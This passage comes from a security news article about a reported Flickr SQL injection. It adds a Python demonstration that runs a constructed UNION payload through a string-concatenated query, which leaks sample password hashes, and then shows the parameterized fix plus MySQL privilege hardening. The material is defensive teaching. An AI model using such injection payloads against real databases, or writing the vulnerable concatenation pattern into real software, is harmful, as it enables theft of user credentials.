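The order_id defect described above is injection through string concatenation: the request parameter is pasted into the SQL text, so a UNION tail changes the shape of the query. The following Python example is added here and is not Flickr’s or Raafat’s code. It uses an in-memory SQLite database as a stand-in for MySQL and shows the vulnerable lookup beside its parameterized replacement; the order_id value is the one from the researcher’s request, while the table contents and the three-column UNION tail are constructed to match the toy query (the page’s payload needed fifteen columns).

```python
import sqlite3


def build_sample_db():
    """In-memory stand-in for the shop database: a constructed orders table plus a users table
    holding the kind of secret a UNION-based injection goes after. Sample data, not Flickr's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (order_id INTEGER, user_id INTEGER, first_name TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)",
                     [(116564954, 1, "aaaa"), (116564955, 2, "bbbb")])
    conn.execute("CREATE TABLE users (id INTEGER, email TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice@example.test", "hash-of-alice"),
                      (2, "bob@example.test", "hash-of-bob")])
    return conn


def lookup_order_vulnerable(conn, order_id):
    """Same shape as the bug described above: the parameter is interpolated into the SQL text,
    so whatever the client sends becomes part of the statement."""
    sql = f"SELECT order_id, user_id, first_name FROM orders WHERE order_id = {order_id}"
    return conn.execute(sql).fetchall()


def lookup_order_safe(conn, order_id):
    """Hardened form: validate the type first, then bind it as a parameter so the database
    receives it as a value rather than as SQL. A UNION tail can no longer alter the query."""
    try:
        oid = int(order_id)
    except (TypeError, ValueError):
        raise ValueError("order_id must be an integer")
    return conn.execute(
        "SELECT order_id, user_id, first_name FROM orders WHERE order_id = ?", (oid,)
    ).fetchall()


# Constructed payload in the shape of the page's order_id injection, sized to this toy query.
INJECTION_PAYLOAD = "-116564954 UNION SELECT id, 0, password_hash FROM users"


def demo():
    """Run the same payload through both lookups; returns (rows leaked, payload rejected)."""
    conn = build_sample_db()
    leaked = lookup_order_vulnerable(conn, INJECTION_PAYLOAD)
    try:
        lookup_order_safe(conn, INJECTION_PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected


if __name__ == "__main__":
    leaked, rejected = demo()
    print("vulnerable query returned:", leaked)
    print("hardened query rejected the payload:", rejected)
```

Parameter binding closes the injection regardless of the backend, but the later steps on the page show why database privileges matter too: in MySQL, LOAD_FILE() and SELECT ... INTO OUTFILE require the FILE privilege and are restricted by the secure_file_priv setting, so running the web application’s database account without FILE, and with secure_file_priv set, is a second, independent layer that turns a data-leak bug into something that cannot become code execution on the host.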

Pierluigi Paganini

(Security Affairs –  Flickr, SQL Injection)